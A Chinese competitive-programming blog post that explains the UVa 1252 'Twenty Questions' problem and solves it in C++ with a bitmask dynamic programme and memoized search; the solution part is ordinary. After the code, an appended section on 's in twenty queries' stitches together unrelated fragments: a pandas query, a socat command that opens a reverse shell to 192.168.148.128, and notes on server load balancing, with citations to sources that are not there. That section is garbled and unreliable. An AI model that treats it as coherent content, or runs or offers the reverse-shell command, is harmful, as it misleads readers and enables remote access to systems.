uva1252 Twenty Questions

本文探讨了一种算法问题,即通过最少的特征询问来唯一确定一个物体。使用状态压缩和记忆化搜索的方法,实现了一个高效的解决方案,并给出了具体的实现代码。

A - Twenty Questions

Time Limit:3000MS Memory Limit:0KB 64bit IO Format:%lld & %llu
Appoint description:
Description
Consider a closed world and a set of features that are defined for all the objects in the world. Each feature can be answered with ``yes" or ``no". Using those features, we can identify any object from the rest of the objects in the world. In other words, each object can be represented as a fixed-length sequence of booleans. Any object is different from other objects by at least one feature.
You would like to identify an object from others. For this purpose, you can ask a series of questions to someone who knows what the object is. Every question you can ask is about one of the features. He/she immediately answers each question with ``yes" or ``no" correctly. You can choose the next question after you get the answer to the previous question.
You kindly pay the answerer 100 yen as a tip for each question. Because you don't have surplus money, it is necessary to minimize the number of questions in the worst case. You don't know what is the correct answer, but fortunately know all the objects in the world. Therefore, you can plan an optimal strategy before you start questioning.
The problem you have to solve is: given a set of boolean-encoded objects, minimize the maximum number of questions by which every object in the set is identifiable.
Input
The input is a sequence of multiple datasets. Each dataset begins with a line which consists of two integers, m and n: the number of features, and the number of objects, respectively. You can assume 0 < m$ \le$11 and 0 < n$ \le$128. It is followed by n lines, each of which corresponds to an object. Each line includes a binary string of length m which represent the value (``yes" or ``no") of features. There are no two identical objects.
The end of the input is indicated by a line containing two zeros. There are at most 100 datasets.
Output
For each dataset, minimize the maximum number of questions by which every object is identifiable and output the result.
Sample Input
8 1
11010101
11 4
00111001100
01001101011
01010000011
01100110001
11 16
01000101111
01011000000
01011111001
01101101001
01110010111
01110100111
10000001010
10010001000
10010110100
10100010100
10101010110
10110100010
11001010011
11011001001
11111000111
11111011101
11 12
10000000000
01000000000
00100000000
00010000000
00001000000
00000100000
00000010000
00000001000
00000000100
00000000010
00000000001
00000000000
9 32
001000000
000100000
000010000
000001000
000000100
000000010
000000001
000000000
011000000
010100000
010010000
010001000
010000100
010000010
010000001
010000000
101000000
100100000
100010000
100001000
100000100
100000010
100000001
100000000
111000000
110100000
110010000
110001000
110000100
110000010
110000001
110000000
0 0
Sample Output
0
2
4
11

9

题意:输入n个m位二进制数,每一位二进制(0 or 1)代表这个物体是否具备这个特征,问最少询问几个特征能把这n个物体都区分出来。。

DP,用了状态压缩和记忆化搜索,dp[s1][s2],代表询问了s1的特征,s2就相当于对他询问的特征的回答。。。所以对每次询问s2都要分成两种情况,一种表示回答是(1)一种回答否(0).。。

然后对每一个状态判断一下他询问的特征和每个物体具备的特征是否可以通过得到的答案区分开来,如果有1个一下不能区分(其实就是剩了一个不能区分,也就区分了),直接返回。。

状态转移方程dp[s1][s2]=min(dp[s1][s2],max(dp[s1|(1<<i)][s2],dp[s1|(1<<i)][s2^(1<<i)]));

/*************************************************************************
	> File Name: uva1252.cpp
	> Author: tjw
	> Mail: 
	> Created Time: 2014年10月21日 星期二 17时36分14秒
 ************************************************************************/

#include<cstdio>
#include<cstring>
#include<algorithm>
#include<cmath>
#include<queue>
#include<vector>
#include<stack>
#include<map>
#define ll long long
#define ls k<<1
#define rs k<<1|1
using namespace std;
const int MAXN=1<<11;
const int INF=1<<30;
int dp[MAXN][MAXN];
int n,m;
int sta[129];
int dfs(int s1,int s2)
{
    int i;
    if(dp[s1][s2]!=-1)
        return dp[s1][s2];
    dp[s1][s2]=INF;
    int num=0;
    for(i=0;i<n;i++)
    {
        if((s1&sta[i])==s2)
            num++;
    }
    if(num<=1)
        return dp[s1][s2]=0;
    for(i=0;i<m;i++)
    {
        if(s1&(1<<i))
            continue;
        int temp=max(dfs(s1|(1<<i),s2),dfs(s1|(1<<i),s2^(1<<i)))+1;
        dp[s1][s2]=min(dp[s1][s2],temp);
    }
    return dp[s1][s2];
}
char str[11];
int main()
{
    int i,j;
    while(scanf("%d%d",&m,&n)==2)
    {
    	if(n==0&&m==0)
    		break;
        for(i=0;i<n;i++)
        {
            scanf("%s",str);
            int s=0;
            for(j=0;str[j];j++)
            {
                if(str[j]=='1')
                    s=(s|(1<<j));
            }
            sta[i]=s;
        }
        memset(dp,-1,sizeof(dp));
        int ans=dfs(0,0);
        printf("%d\n",ans);
    }
    return 0;
}


### 关于 's in twenty queries' 的相关信息 在探讨 “s in twenty queries” 这一主题时,可以将其理解为一种优化查询效率的技术方法或者算法设计思路。虽然当前提供的引用并未直接提及该具体短语,但从技术角度出发,可以通过分析已知内容来推测其可能的应用场景。 #### 查询优化与数据处理 如果目标是在二十次查询内完成特定任务,则需要考虑如何高效地利用数据库资源并减少冗余操作。例如,在 Python 中通过 Pandas 库实现复杂 SQL 查询的结果展示[^3]: ```python import pandas as pd query = f""" SELECT id, sentences, cosineDistance(embeddings, {input_embedding}) AS similarity FROM DocEmbeddings LIMIT 10 """ df = pd.DataFrame(client.query(query).result_rows) ``` 此代码片段展示了如何构建一个基于嵌入向量相似度计算的查询,并将结果转换成易于阅读的数据帧格式。这种方法特别适用于自然语言处理领域中的文档检索应用。 #### 后门连接与网络安全考量 当讨论到网络通信或远程访问时,“socat STDIO TCP4:192.168.148.128:22,sourceport=8888”的命令用于建立反向Shell连接[^1]。尽管这看起来像是渗透测试的一部分,但在实际部署过程中需严格遵循法律法规及道德准则,确保不会侵犯他人隐私或损害第三方利益。 #### 负载均衡提升性能表现 全球服务器负载平衡 (GSLB)[^2] 是另一种提高服务可用性和响应速度的有效手段。“Distributing Internet traffic amongst a large number of connected servers dispersed around the world.” 描述了这种机制的核心原理——即合理分配流量至不同地理位置上的节点上运行的服务实例之间。对于大规模在线平台而言尤为重要。 综上所述,“s in twenty queries” 可能涉及多种计算机科学分支下的理论研究和技术实践;无论是针对文本挖掘还是系统架构层面都值得深入探索。
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值